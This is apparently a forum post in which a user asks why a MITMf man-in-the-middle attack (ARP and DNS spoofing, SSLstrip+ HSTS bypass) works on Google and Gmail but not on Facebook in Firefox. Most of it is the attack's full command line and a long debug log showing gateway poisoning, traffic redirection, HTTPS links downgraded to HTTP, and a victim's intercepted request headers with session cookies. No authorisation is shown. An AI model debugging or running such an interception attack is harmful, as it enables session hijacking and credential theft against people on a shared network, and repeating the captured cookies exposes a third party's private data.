I am using mitmf in kali linux 2.0(sana). it works in IE browser. but when i tested the mitmf in mozilla firefox it works fine with google.com and gmail.com but not with facebook.com.what may be the cause ?
problem is in the following file......please solve it . I am confused. thank you.....
root@kali:~/MITMf# workon MITMf
(MITMf)root@kali:~/MITMf# python mitmf.py -i eth0 --target --gateway --arp --dns --spoof --hsts --log-level debug
¦¦¦_ _¦¦¦¦ ¦¦¦___¦¦¦¦¦¦ ¦¦¦_ _¦¦¦¦ ¦¦¦¦¦¦
¦¦¦¦¯¦¯ ¦¦¦¦¦¦¦¦ ¦¦¦ ¦¦¦¦¦¦¯¦¯ ¦¦¦¦¦¦ ¦
¦¦¦ ¦¦¦¦¦¦¦¦¦ ¦¦¦¦ ¦¦¦¦¦ ¦¦¦¦¦¦¦¦¦ ¦
¦¦¦ ¦¦¦ ¦¦¦¦¦ ¦¦¦¦ ¦ ¦¦¦ ¦¦¦ ¦¦¦¦ ¦
¦¦¦¦ ¦¦¦¦¦¦¦¦ ¦¦¦¦ ¦ ¦¦¦¦ ¦¦¦¦¦¦¦¦
¦ ¦¦ ¦ ¦¦¦ ¦ ¦¦ ¦ ¦¦ ¦ ¦ ¦ ¦
¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦
¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦
¦ ¦ ¦
2016-02-16 14:44:25 MITMf started: 'mitmf.py', '-i', 'eth0', '--target', '', '--gateway', '', '--arp', '--dns', '--spoof', '--hsts', '--log-level', 'debug'
* MITMf v0.9.8 - 'The Dark Side'
| Net-Creds v1.0 online
2016-02-16 14:44:25 ProxyPlugins Adding SSLstrip+ plugin
| SSLstrip+ v0.4
| | SSLstrip+ by Leonardo Nve running
2016-02-16 14:44:25 ProxyPlugins Adding Spoof plugin
| Spoof v0.6
2016-02-16 14:44:25 ARPpoisoner gatewayip =>
2016-02-16 14:44:25 ARPpoisoner gatewaymac => c4:a8:1d:1d:35:1a
2016-02-16 14:44:25 ARPpoisoner targets => IPAddress('')
2016-02-16 14:44:25 ARPpoisoner ignore =>
2016-02-16 14:44:25 ARPpoisoner ip =>
2016-02-16 14:44:25 ARPpoisoner mac => 30:65:ec:3e:f6:b8
2016-02-16 14:44:25 ARPpoisoner interface => eth0
2016-02-16 14:44:25 ARPpoisoner arpmode => rep
2016-02-16 14:44:25 ARPpoisoner interval => 3
2016-02-16 14:44:25 Utils Setting iptables DNS redirection rule from port 53 to 53
2016-02-16 14:44:25 Utils Setting ip forwarding to 1
2016-02-16 14:44:25 Utils Setting iptables HTTP redirection rule from port 80 to 10000
| | DNS spoofing enabled
| | ARP spoofing enabled
| Sergio-Proxy v0.2.1 online
| SSLstrip v0.9 by Moxie Marlinspike online
| MITMf-API online
- Running on (Press CTRL+C to quit)
| HTTP server online
| DNSChef v0.4 online
| SMB server online
2016-02-16 14:44:27 ARPpoisoner Resolved => 00:25:22:c3:14:3c
2016-02-16 14:44:34 ClientRequest Resolving host: fionades.com
2016-02-16 14:44:34 URLMonitor Parsing host: fionades.com
2016-02-16 14:44:34 URLMonitor Host not in list: fionades.com
2016-02-16 14:44:34 ClientRequest Host not cached.
2016-02-16 14:44:34 ClientRequest Resolving with DNSChef
2016-02-16 14:44:34 DNS Proxying the response of type 'A' for fionades.com
2016-02-16 14:44:34 ClientRequest Resolved host successfully: fionades.com ->
2016-02-16 14:44:34 URLMonitor Parsing host: fionades.com
2016-02-16 14:44:34 URLMonitor Host not in list: fionades.com
2016-02-16 14:44:34 ClientRequest Modifing HOST header: fionades.com -> fionades.com
2016-02-16 14:44:34 URLMonitor Parsing host: fionades.com
2016-02-16 14:44:34 URLMonitor Host not in list: fionades.com
2016-02-16 14:44:34 ClientRequest Sending request via HTTP
2016-02-16 14:44:51 DNS Proxying the response of type 'A' for teredo.ipv6.microsoft.com
2016-02-16 14:44:54 DNS Proxying the response of type 'A' for teredo.ipv6.microsoft.com
2016-02-16 14:44:59 DNS Proxying the response of type 'A' for download.mozilla.org
2016-02-16 14:44:59 DNS Proxying the response of type 'A' for bouncer-bouncer-elb.prod.mozaws.net
2016-02-16 14:44:59 ClientRequest Resolving host: download.mozilla.org
2016-02-16 14:44:59 URLMonitor Parsing host: download.mozilla.org
2016-02-16 14:44:59 URLMonitor Host not in list: download.mozilla.org
2016-02-16 14:44:59 ClientRequest Host not cached.
2016-02-16 14:44:59 ClientRequest Resolving with DNSChef
2016-02-16 14:44:59 DNS Proxying the response of type 'A' for download.mozilla.org
2016-02-16 14:44:59 ClientRequest Resolved host successfully: download.mozilla.org ->
2016-02-16 14:44:59 URLMonitor Parsing host: download.mozilla.org
2016-02-16 14:44:59 URLMonitor Host not in list: download.mozilla.org
2016-02-16 14:44:59 ClientRequest Modifing HOST header: download.mozilla.org -> download.mozilla.org
2016-02-16 14:44:59 URLMonitor Parsing host: download.mozilla.org
2016-02-16 14:44:59 URLMonitor Host not in list: download.mozilla.org
2016-02-16 14:44:59 ClientRequest Sending request via HTTP
2016-02-16 14:44:59 DNS Proxying the response of type 'AAAA' for bouncer-bouncer-elb.prod.mozaws.net
2016-02-16 14:45:00 ServerConnection HTTP connection made.
2016-02-16 14:45:00 ProxyPlugins hooking connectionMade()
2016-02-16 14:45:00 type:Firefox-43 os:Windows 7 download.mozilla.org
2016-02-16 14:45:00 ServerConnection Full request: download.mozilla.org/?product=firefox-44.0.2-complete&os=win&lang=en-US
2016-02-16 14:45:00 ServerConnection Sending header: (connection: keep-alive)
2016-02-16 14:45:00 ServerConnection Sending header: (accept-language: en-US,en;q=0.5)
2016-02-16 14:45:00 ServerConnection Sending header: (pragma: no-cache)
2016-02-16 14:45:00 ServerConnection Sending header: (content-length: 0)
2016-02-16 14:45:00 ServerConnection Sending header: (cookie: ga=GA1.2.1996003411.1448427476)
2016-02-16 14:45:00 ServerConnection Sending header: (range: bytes=13500000-13799999)
2016-02-16 14:45:00 ServerConnection Sending header: (host: download.mozilla.org)
2016-02-16 14:45:00 ServerConnection Sending header: (accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8)
2016-02-16 14:45:00 ServerConnection Sending header: (user-agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0)
2016-02-16 14:45:00 ProxyPlugins hooking handleStatus()
2016-02-16 14:45:00 ServerConnection Server response: HTTP/1.1 302 Found
2016-02-16 14:45:00 ProxyPlugins hooking handleEndHeaders()
2016-02-16 14:45:00 ServerConnection Receiving header: (expires: 0)
2016-02-16 14:45:00 ServerConnection Receiving header: (host: download.mozilla.org)
2016-02-16 14:45:00 ServerConnection Receiving header: (connection: keep-alive)
2016-02-16 14:45:00 ServerConnection Receiving header: (location: http://download.cdn.mozilla.net/pub/firefox/releases/44.0.2/update/win32/en-US/firefox-44.0.2.complete.mar)
2016-02-16 14:45:00 ServerConnection Receiving header: (cache-control: No-Cache)
2016-02-16 14:45:00 ServerConnection Receiving header: (date: Tue, 16 Feb 2016 09:00:00 GMT)
2016-02-16 14:45:00 ServerConnection Receiving header: (content-type: text/html; charset=utf-8)
2016-02-16 14:45:00 ProxyPlugins hooking handleResponse()
2016-02-16 14:45:00 ServerConnection Read from server 129 bytes of data
2016-02-16 14:45:01 DNS Proxying the response of type 'A' for akd.search.tb.ask.com
2016-02-16 14:45:01 DNS Proxying the response of type 'A' for home.tb.ask.com
2016-02-16 14:45:01 DNS Proxying the response of type 'A' for download.cdn.mozilla.net
2016-02-16 14:45:01 DNS Proxying the response of type 'A' for akz.imgfarm.com
2016-02-16 14:45:01 DNS Proxying the response of type 'A' for a1339.b.akamai.net
2016-02-16 14:45:01 ClientRequest Resolving host: home.tb.ask.com
2016-02-16 14:45:01 URLMonitor Parsing host: home.tb.ask.com
2016-02-16 14:45:01 URLMonitor Host not in list: home.tb.ask.com
2016-02-16 14:45:01 ClientRequest Host not cached.
2016-02-16 14:45:01 ClientRequest Resolving with DNSChef
2016-02-16 14:45:01 DNS Proxying the response of type 'A'
for home.tb.ask.com
2016-02-16 14:45:01 DNS Proxying the response of type 'AAAA' for a1095.b.akamai.net
2016-02-16 14:45:01 ClientRequest Resolved host successfully: home.tb.ask.com ->
2016-02-16 14:45:01 URLMonitor Parsing host: home.tb.ask.com
2016-02-16 14:45:01 DNS Proxying the response of type 'AAAA' for a1339.b.akamai.net
2016-02-16 14:45:01 URLMonitor Host not in list: home.tb.ask.com
2016-02-16 14:45:01 ClientRequest Modifing HOST header: home.tb.ask.com -> home.tb.ask.com
2016-02-16 14:45:01 ClientRequest Zapped encoding
2016-02-16 14:45:01 URLMonitor Parsing host: home.tb.ask.com
2016-02-16 14:45:01 DNS Proxying the response of type 'A' for e3432.b.akamaiedge.net
2016-02-16 14:45:01 URLMonitor Host not in list: home.tb.ask.com
2016-02-16 14:45:01 ClientRequest Sending request via HTTP
2016-02-16 14:45:01 ClientRequest Resolving host: download.cdn.mozilla.net
2016-02-16 14:45:01 URLMonitor Parsing host: download.cdn.mozilla.net
2016-02-16 14:45:01 URLMonitor Host not in list: download.cdn.mozilla.net
2016-02-16 14:45:01 ClientRequest Host not cached.
2016-02-16 14:45:01 ClientRequest Resolving with DNSChef
2016-02-16 14:45:01 DNS Proxying the response of type 'A' for download.cdn.mozilla.net
2016-02-16 14:45:01 DNS Proxying the response of type 'A' for a1284.g.akamai.net
2016-02-16 14:45:01 ClientRequest Resolved host successfully: download.cdn.mozilla.net ->
2016-02-16 14:45:01 URLMonitor Parsing host: download.cdn.mozilla.net
2016-02-16 14:45:01 URLMonitor Host not in list: download.cdn.mozilla.net
2016-02-16 14:45:01 ClientRequest Modifing HOST header: download.cdn.mozilla.net -> download.cdn.mozilla.net
2016-02-16 14:45:01 URLMonitor Parsing host: download.cdn.mozilla.net
2016-02-16 14:45:01 URLMonitor Host not in list: download.cdn.mozilla.net
2016-02-16 14:45:01 ClientRequest Sending request via HTTP
2016-02-16 14:45:01 ServerConnection HTTP connection made.
2016-02-16 14:45:01 ProxyPlugins hooking connectionMade()
2016-02-16 14:45:01 type:Firefox-43 os:Windows 7 home.tb.ask.com
2016-02-16 14:45:01 ServerConnection Full request: home.tb.ask.com/index.jhtml?ptb=CA60091B-AA5B-4DB1-9F87-367FC824535F&n=781bb9fc&p2=^BXM^xdm004^YYA^np
2016-02-16 14:45:01 ServerConnection Sending header: (connection: keep-alive)
2016-02-16 14:45:01 ServerConnection Sending header: (accept-language: en-US,en;q=0.5)
2016-02-16 14:45:01 ServerConnection Sending header: (pragma: no-cache)
2016-02-16 14:45:01 ServerConnection Sending header: (content-length: 0)
2016-02-16 14:45:01 ServerConnection Sending header: (cookie: np="781bb9fc"; UID="CA60091B-AA5B-4DB1-9F87-367FC824535F"; hst1="caKku%2BPymdqy%2BTD0eO29A2o8cHKTNk9PfEX4O6p5Dyk%2F0TrNYcu7%2FHqx5utHn73n"; anx="u=6E69F7F4-9E17-4DE5-B4F4-2CECE7066E53&fv=1445138900833&lv=1455611799630&nv=469&t=CA60091B-AA5B-4DB1-9F87-367FC824535F&v=-&p=%5EBXM%5Exdm004%5EYYA%5Enp&si=-&sn=dfprdsrchfe22.df.jabodo.com&od=none&op=-&ok=-&om=-&ob=-&oc=-&os=-&w=1093&h=614&cd=24&f=-&g=-"; ccsP="qv=27|1455593331405"; aqld="uo~"; _gads=ID=e3edf7f7757f8eaa:T=1445744850:S=ALNIManx-z6U9QU-OdlnQg6QzbURp2OLw; si="CLXO4fWVmMUCFVQmjgodooEAmg"; BEEFHOOK=UO1oTWytazpSO4LZjKml65Sfj9Gt1Sqfq9JoN4rDrVycTG7NRX6hWZyzDxtTsoM4Zo35PG3bsx3AOOzI; mindsparktb224179243=true; mindsparktbsupport224179243=true; mindsparkextensionapifeatures224179243=TOOLBARCLEANER; mindsparktb220280897=true; mindsparktbsupport220280897=true; mindsparkextensionapifeatures220280897=TOOLBARCLEANER)
2016-02-16 14:45:01 ServerConnection Sending header: (host: home.tb.ask.com)
2016-02-16 14:45:01 ServerConnection Sending header: (accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8)
2016-02-16 14:45:01 ServerConnection Sending header: (user-agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0)
2016-02-16 14:45:01 ServerConnection HTTP connection made.
2016-02-16 14:45:01 ProxyPlugins hooking connectionMade()
2016-02-16 14:45:01 type:Firefox-43 os:Windows 7 download.cdn.mozilla.net
2016-02-16 14:45:01 ServerConnection Full request: download.cdn.mozilla.net/pub/firefox/releases/44.0.2/update/win32/en-US/firefox-44.0.2.complete.mar
2016-02-16 14:45:01 ServerConnection Sending header: (connection: keep-alive)
2016-02-16 14:45:01 ServerConnection Sending header: (accept-language: en-US,en;q=0.5)
2016-02-16 14:45:01 ServerConnection Sending header: (pragma: no-cache)
2016-02-16 14:45:01 ServerConnection Sending header: (content-length: 0)
2016-02-16 14:45:01 ServerConnection Sending header: (range: bytes=13500000-13799999)
2016-02-16 14:45:01 ServerConnection Sending header: (host: download.cdn.mozilla.net)
2016-02-16 14:45:01 ServerConnection Sending header: (accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8)
2016-02-16 14:45:01 ServerConnection Sending header: (user-agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0)
2016-02-16 14:45:01 ProxyPlugins hooking handleStatus()
2016-02-16 14:45:01 ServerConnection Server response: HTTP/1.0 206 Partial Content
2016-02-16 14:45:02 ProxyPlugins hooking handleEndHeaders()
2016-02-16 14:45:02 ServerConnection Receiving header: (last-modified: Thu, 11 Feb 2016 16:44:39 GMT)
2016-02-16 14:45:02 ServerConnection Receiving header: (connection: keep-alive)
2016-02-16 14:45:02 ServerConnection Receiving header: (accept-ranges: bytes)
2016-02-16 14:45:02 ServerConnection Receiving header: (expires: 0)
2016-02-16 14:45:02 ServerConnection Receiving header: (content-range: bytes 13500000-13799999/51118125)
2016-02-16 14:45:02 ServerConnection Receiving header: (server: AmazonS3)
2016-02-16 14:45:02 ServerConnection Receiving header: (x-amz-replication-status: COMPLETED)
2016-02-16 14:45:02 ServerConnection Receiving header: (host: download.cdn.mozilla.net)
2016-02-16 14:45:02 ServerConnection Receiving header: (etag: "8ef00168510847f9d21e4a60ad13f4ee")
2016-02-16 14:45:02 ServerConnection Receiving header: (x-amz-cf-id: 4sY28wthpVqfcmCIsAsBXYzPoGI5lbuyA-hBs7XOXCyaieBk58e5Sg==)
2016-02-16 14:45:02 ServerConnection Receiving header: (cache-control: No-Cache)
2016-02-16 14:45:02 ServerConnection Receiving header: (date: Tue, 16 Feb 2016 09:00:01 GMT)
2016-02-16 14:45:02 ServerConnection Receiving header: (x-amz-version-id: Wy7NNU4K5xLFtKgsn.TeEbuvB3lErvZl)
2016-02-16 14:45:02 ServerConnection Receiving header: (content-type: application/octet-stream)
2016-02-16 14:45:02 DNS Proxying the response of type 'AAAA' for e3432.b.akamaiedge.net
2016-02-16 14:45:02 DNS Proxying the response of type 'AAAA' for a1284.g.akamai.net
2016-02-16 14:45:02 ProxyPlugins hooking handleStatus()
2016-02-16 14:45:02 ServerConnection Server response: HTTP/1.0 200 OK
2016-02-16 14:45:02 ProxyPlugins hooking handleEndHeaders()
2016-02-16 14:45:02 ServerConnection Receiving header: (set-cookie: anx="u=6E69F7F4-9E17-4DE5-B4F4-2CECE7066E53&fv=1445138900833&lv=1455613202038&nv=470&t=CA60091B-AA5B-4DB1-9F87-367FC824535F&v=-&p=%5EBXM%5Exdm004%5EYYA%5Enp&si=-&sn=dfprdsrchfe4.df.jabodo.com&od=none&op=-&ok=-&om=-&ob=-&oc=-&os=-&w=1093&h=614&cd=24&f=-&g=-"; Version=1; Domain=.tb.ask.com; Max-Age=7776000; Expires=Mon, 16-May-2016 09:00:02 GMT; Path=/)
2016-02-16 14:45:02 ServerConnection Receiving header: (expires: 0)
2016-02-16 14:45:02 ServerConnection Receiving header: (connection: close)
2016-02-16 14:45:02 ServerConnection Receiving header: (server: Apache)
2016-02-16 14:45:02 ServerConnection Receiving header: (host: home.tb.ask.com)
2016-02-16 14:45:02 ServerConnection Receiving header: (x-ua-compatible: IE=Edge)
2016-02-16 14:45:02 ServerConnection Receiving header: (cache-control: No-Cache)
2016-02-16 14:45:02 ServerConnection Receiving header: (date: Tue, 16 Feb 2016 09:00:02 GMT)
2016-02-16 14:45:02 ServerConnection Receiving header: (p3p: policyref="http://search.mindspark.com/p3p/p3p.xml", CP="CURa ADMa DEVa PSA PSD OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR")
2016-02-16 14:45:02 ServerConnection Receiving header: (content-type: text/html;charset=UTF-8)
2016-02-16 14:45:02 DNS Proxying the response of type 'A' for ak.ssl.imgfarm.com
2016-02-16 14:45:03 ServerConnection Found secure reference: https://mail.google.com
2016-02-16 14:45:03 ServerConnection Replacing https://mail.google.com => http://gmail.google.com/
2016-02-16 14:45:03 ProxyPlugins hooking handleResponse()
2016-02-16 14:45:03 ServerConnection Read from server 38215 bytes of data
2016-02-16 14:45:03 DNS Proxying the response of type 'A' for e3432.g.akamaiedge.net
2016-02-16 14:45:03 DNS Proxying the response of type 'A' for ak.imgfarm.com
2016-02-16 14:45:03 DNS Proxying the response of type 'AAAA' for e3432.g.akamaiedge.net
2016-02-16 14:45:04 ServerConnectionFactory Server connection failed.
2016-02-16 14:45:04 ServerConnectionFactory Retrying via SSL
2016-02-16 14:45:05 ProxyPlugins hooking handleResponse()
2016-02-16 14:45:05 ServerConnection Read from server 300000 bytes of data
2016-02-16 14:45:05 DNS Proxying the response of type 'AAAA' for e3432.g.akamaiedge.net
2016-02-16 14:45:05 ClientRequest Resolving host: gn.symcd.com
2016-02-16 14:45:05 URLMonitor Parsing host: gn.symcd.com
2016-02-16 14:45:05 URLMonitor Host not in list: gn.symcd.com
2016-02-16 14:45:05 ClientRequest Host not cached.
2016-02-16 14:45:05 ClientRequest Resolving with DNSChef
2016-02-16 14:45:05 DNS Proxying the response of type 'A' for gn.symcd.com
2016-02-16 14:45:06 ClientRequest Resolved host successfully: gn.symcd.com ->
2016-02-16 14:45:06 URLMonitor Parsing host: gn.symcd.com
2016-02-16 14:45:06 URLMonitor Host not in list: gn.symcd.com
2016-02-16 14:45:06 DNS Proxying the response of type 'A' for gn.symcd.com
2016-02-16 14:45:06 ClientRequest Modifing HOST header: gn.symcd.com -> gn.symcd.com
2016-02-16 14:45:06 ClientRequest Zapped encoding
2016-02-16 14:45:06 URLMonitor Parsing host: gn.symcd.com
2016-02-16 14:45:06 URLMonitor Host not in list: gn.symcd.com
2016-02-16 14:45:06 ClientRequest Sending request via HTTP
2016-02-16 14:45:06 ClientRequest Resolving host: gn.symcd.com
2016-02-16 14:45:06 DNS Proxying the response of type 'AAAA' for a1255.g.akamai.net
2016-02-16 14:45:06 URLMonitor Parsing host: gn.symcd.com
2016-02-16 14:45:06 URLMonitor Host not in list: gn.symcd.com
2016-02-16 14:45:06 ClientRequest Host cached: gn.symcd.com
2016-02-16 14:45:06 ClientRequest Resolved host successfully: gn.symcd.com ->
2016-02-16 14:45:06 URLMonitor Parsing host: gn.symcd.com
2016-02-16 14:45:06 URLMonitor Host not in list: gn.symcd.com
2016-02-16 14:45:06 ClientRequest Modifing HOST header: gn.symcd.com -> gn.symcd.com
2016-02-16 14:45:06 DNS Proxying the response of type 'A' for e8218.dscb1.akamaiedge.net
2016-02-16 14:45:06 ClientRequest Zapped encoding
2016-02-16 14:45:06 URLMonitor Parsing host: gn.symcd.com
2016-02-16 14:45:06 URLMonitor Host not in list: gn.symcd.com
2016-02-16 14:45:06 ClientRequest Sending request via HTTP
2016-02-16 14:45:06 ClientRequest Resolving host: gn.symcd.com
2016-02-16 14:45:06 URLMonitor Parsing host: gn.symcd.com
2016-02-16 14:45:06 URLMonitor Host not in list: gn.symcd.com
2016-02-16 14:45:06 ClientRequest Host cached: gn.symcd.com
2016-02-16 14:45:06 ClientRequest Resolved host successfully: gn.symcd.com ->
2016-02-16 14:45:06 URLMonitor Parsing host: gn.symcd.com
2016-02-16 14:45:06 URLMonitor Host not in list: gn.symcd.com
2016-02-16 14:45:06 ClientRequest Modifing HOST header: gn.symcd.com -> gn.symcd.com
2016-02-16 14:45:06 ClientRequest Zapped encoding
2016-02-16 14:45:06 URLMonitor Parsing host: gn.symcd.com
2016-02-16 14:45:06 DNS Proxying the response of type 'AAAA' for e8218.dscb1.akamaiedge.net
2016-02-16 14:45:06 URLMonitor Host not in list: gn.symcd.com
2016-02-16 14:45:06 ClientRequest Sending request via HTTP
2016-02-16 14:45:06 DNS Proxying the response of type 'A' for themes.googleusercontent.com
2016-02-16 14:45:06 ClientRequest Resolving host: gn.symcd.com
2016-02-16 14:45:06 URLMonitor Parsing host: gn.symcd.com
2016-02-16 14:45:06 URLMonitor Host not in list: gn.symcd.com
2016-02-16 14:45:06 ClientRequest Host cached: gn.symcd.com
2016-02-16 14:45:06 ClientRequest Resolved host successfully: gn.symcd.com ->
2016-02-16 14:45:06 URLMonitor Parsing host: gn.symcd.com
2016-02-16 14:45:06 URLMonitor Host not in list: gn.symcd.com
2016-02-16 14:45:06 ClientRequest Modifing HOST header: gn.symcd.com -> gn.symcd.com
2016-02-16 14:45:06 ClientRequest Zapped encoding
2016-02-16 14:45:06 URLMonitor Parsing host: gn.symcd.com
2016-02-16 14:45:06 URLMonitor Host not in list: gn.symcd.com
2016-02-16 14:45:06 ClientRequest Sending request via HTTP
2016-02-16 14:45:06 ServerConnection HTTP connection made.
2016-02-16 14:45:06 ProxyPlugins hooking connectionMade()
2016-02-16 14:45:06 ServerConnection Sending header: (content-length: 83)
2016-02-16 14:45:06 ServerConnection Sending header: (accept-language: en-US,en;q=0.5)
2016-02-16 14:45:06 ServerConnection Sending header: (connection: keep-alive)
2016-02-16 14:45:06 ServerConnection Sending header: (accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8)
2016-02-16 14:45:06 ServerConnection Sending header: (user-agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0)
2016-02-16 14:45:06 ServerConnection Sending header: (host: gn.symcd.com)
2016-02-16 14:45:06 ServerConnection Sending header: (pragma: no-cache)
2016-02-16 14:45:06 ServerConnection Sending header: (content-type: application/ocsp-request)
2016-02-16 14:45:06 ServerConnection HTTP connection made.
2016-02-16 14:45:06 ProxyPlugins hooking connectionMade()
2016-02-16 14:45:06 DNS Proxying the response of type 'AAAA' for googlehosted.l.googleusercontent.com
2016-02-16 14:45:06 ServerConnection Sending header: (content-length: 83)
2016-02-16 14:45:06 ServerConnection Sending header: (accept-language: en-US,en;q=0.5)
2016-02-16 14:45:06 ServerConnection Sending header: (connection: keep-alive)
2016-02-16 14:45:06 ServerConnection Sending header: (accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8)
2016-02-16 14:45:06 ServerConnection Sending header: (user-agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0)
2016-02-16 14:45:06 ServerConnection Sending header: (host: gn.symcd.com)
2016-02-16 14:45:06 ServerConnection Sending header: (pragma: no-cache)
2016-02-16 14:45:06 ServerConnection Sending header: (content-type: application/ocsp-request)
2016-02-16 14:45:06 ClientRequest Resolving host: gn.symcd.com
2016-02-16 14:45:06 URLMonitor Parsing host: gn.symcd.com
2016-02-16 14:45:06 URLMonitor Host not in list: gn.symcd.com
2016-02-16 14:45:06 ClientRequest Host cached: gn.symcd.com
2016-02-16 14:45:06 ClientRequest Resolved host successfully: gn.symcd.com ->
2016-02-16 14:45:06 URLMonitor Parsing host: gn.symcd.com
2016-02-16 14:45:07 URLMonitor Host not in list: gn.symcd.com
2016-02-16 14:45:07 ClientRequest Modifing HOST header: gn.symcd.com -> gn.symcd.com
2016-02-16 14:45:07 ClientRequest Zapped encoding
2016-02-16 14:45:07 URLMonitor Parsing host: gn.symcd.com
2016-02-16 14:45:07 URLMonitor Host not in list: gn.symcd.com
2016-02-16 14:45:07 ClientRequest Sending request via HTTP
2016-02-16 14:45:07 ServerConnection HTTP connection made.
2016-02-16 14:45:07 ProxyPlugins hooking connectionMade()
2016-02-16 14:45:07 ServerConnection Sending header: (content-length: 83)
2016-02-16 14:45:07 ServerConnection Sending header: (accept-language: en-US,en;q=0.5)
2016-02-16 14:45:07 ServerConnection Sending header: (connection: keep-alive)
2016-02-16 14:45:07 ServerConnection Sending header: (accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8)
2016-02-16 14:45:07 ServerConnection Sending header: (user-agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0)
2016-02-16 14:45:07 ServerConnection Sending header: (host: gn.symcd.com)
2016-02-16 14:45:07 ServerConnection Sending header: (pragma: no-cache)
2016-02-16 14:45:07 ServerConnection Sending header: (content-type: application/ocsp-request)
2016-02-16 14:45:07 DNS Resolving 'gmail.google.com' to 'mail.google.com' for HSTS bypass
2016-02-16 14:45:07 DNS Proxying the response of type 'A' for www.yahoo.com
2016-02-16 14:45:07 DNS Proxying the response of type 'A' for www.facebook.com
2016-02-16 14:45:07 ServerConnection HTTP connection made.
2016-02-16 14:45:07 ProxyPlugins hooking connectionMade()
2016-02-16 14:45:07 ServerConnection Sending header: (content-length: 83)
2016-02-16 14:45:07 ServerConnection Sending header: (accept-language: en-US,en;q=0.5)
2016-02-16 14:45:07 ServerConnection Sending header: (connection: keep-alive)
2016-02-16 14:45:07 ServerConnection Sending header: (accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8)
2016-02-16 14:45:07 ServerConnection Sending header: (user-agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0)
2016-02-16 14:45:07 ServerConnection Sending header: (host: gn.symcd.com)
2016-02-16 14:45:07 DNS Proxying the response of type 'A' for self-repair.mozilla.org
2016-02-16 14:45:07 ServerConnection Sending header: (pragma: no-cache)
2016-02-16 14:45:07 ServerConnection Sending header: (content-type: application/ocsp-request)
2016-02-16 14:45:07 ProxyPlugins hooking handleStatus()
2016-02-16 14:45:07 ServerConnection Server response: HTTP/1.0 200 OK
2016-02-16 14:45:07 ProxyPlugins hooking handleEndHeaders()
2016-02-16 14:45:07 ServerConnection Receiving header: (content-transfer-encoding: binary)
2016-02-16 14:45:07 ServerConnection Receiving header: (expires: 0)
2016-02-16 14:45:07 ServerConnection Receiving header: (connection: keep-alive)
2016-02-16 14:45:07 ServerConnection Receiving header: (server: nginx/1.4.7)
2016-02-16 14:45:07 DNS Proxying the response of type 'A' for fd-fp3.wg1.b.yahoo.com
2016-02-16 14:45:07 DNS Proxying the response of type 'A' for googlemail.l.google.com
2016-02-16 14:45:07 ServerConnection Receiving header: (last-modified: Mon, 15 Feb 2016 01:49:36 GMT)
2016-02-16 14:45:07 ServerConnection Receiving header: (host: gn.symcd.com)
2016-02-16 14:45:07 ServerConnection Receiving header: (cache-control: No-Cache)
2016-02-16 14:45:07 DNS Proxying the response of type 'A' for star-mini.c10r.facebook.com
2016-02-16 14:45:07 ServerConnection Receiving header: (date: Tue, 16 Feb 2016 09:00:07 GMT)
2016-02-16 14:45:07 ServerConnection Receiving header: (content-type: application/ocsp-response)
2016-02-16 14:45:07 ProxyPlugins hooking handleResponse()
2016-02-16 14:45:07 ServerConnection Read from server 1419 bytes of data
2016-02-16 14:45:07 ProxyPlugins hooking handleStatus()
2016-02-16 14:45:07 ServerConnection Server response: HTTP/1.0 200 OK
2016-02-16 14:45:07 ProxyPlugins hooking handleEndHeaders()
2016-02-16 14:45:07 ServerConnection Receiving header: (content-transfer-encoding: binary)
2016-02-16 14:45:07 ServerConnection Receiving header: (expires: 0)
2016-02-16 14:45:07 ServerConnection Receiving header: (connection: keep-alive)
2016-02-16 14:45:07 ServerConnection Receiving header: (server: nginx/1.4.7)
2016-02-16 14:45:07 ServerConnection Receiving header: (last-modified: Mon, 15 Feb 2016 01:49:36 GMT)
2016-02-16 14:45:07 ServerConnection Receiving header: (host: gn.symcd.com)
2016-02-16 14:45:07 ServerConnection Receiving header: (cache-control: No-Cache)
2016-02-16 14:45:07 ServerConnection Receiving header: (date: Tue, 16 Feb 2016 09:00:07 GMT)
2016-02-16 14:45:07 ServerConnection Receiving header: (content-type: application/ocsp-response)
2016-02-16 14:45:07 ProxyPlugins hooking handleResponse()
2016-02-16 14:45:07 ServerConnection Read from server 1419 bytes of data
2016-02-16 14:45:07 ServerConnection HTTP connection made.
2016-02-16 14:45:07 ProxyPlugins hooking connectionMade()
2016-02-16 14:45:07 ServerConnection Sending header: (content-length: 83)
2016-02-16 14:45:07 ServerConnection Sending header: (accept-language: en-US,en;q=0.5)
2016-02-16 14:45:07 ServerConnection Sending header: (connection: keep-alive)
2016-02-16 14:45:07 ServerConnection Sending header: (accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8)
2016-02-16 14:45:07 ServerConnection Sending header: (user-agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0)
2016-02-16 14:45:07 ServerConnection Sending header: (host: gn.symcd.com)
2016-02-16 14:45:07 DNS Proxying the response of type 'AAAA' for googlemail.l.google.com
2016-02-16 14:45:07 ServerConnection Sending header: (pragma: no-cache)
2016-02-16 14:45:07 DNS Proxying the response of type 'AAAA' for star-mini.c10r.facebook.com
2016-02-16 14:45:07 ServerConnection Sending header: (content-type: application/ocsp-request)
2016-02-16 14:45:07 ProxyPlugins hooking handleStatus()
2016-02-16 14:45:07 ServerConnection Server response: HTTP/1.0 200 OK
2016-02-16 14:45:07 ProxyPlugins hooking handleEndHeaders()
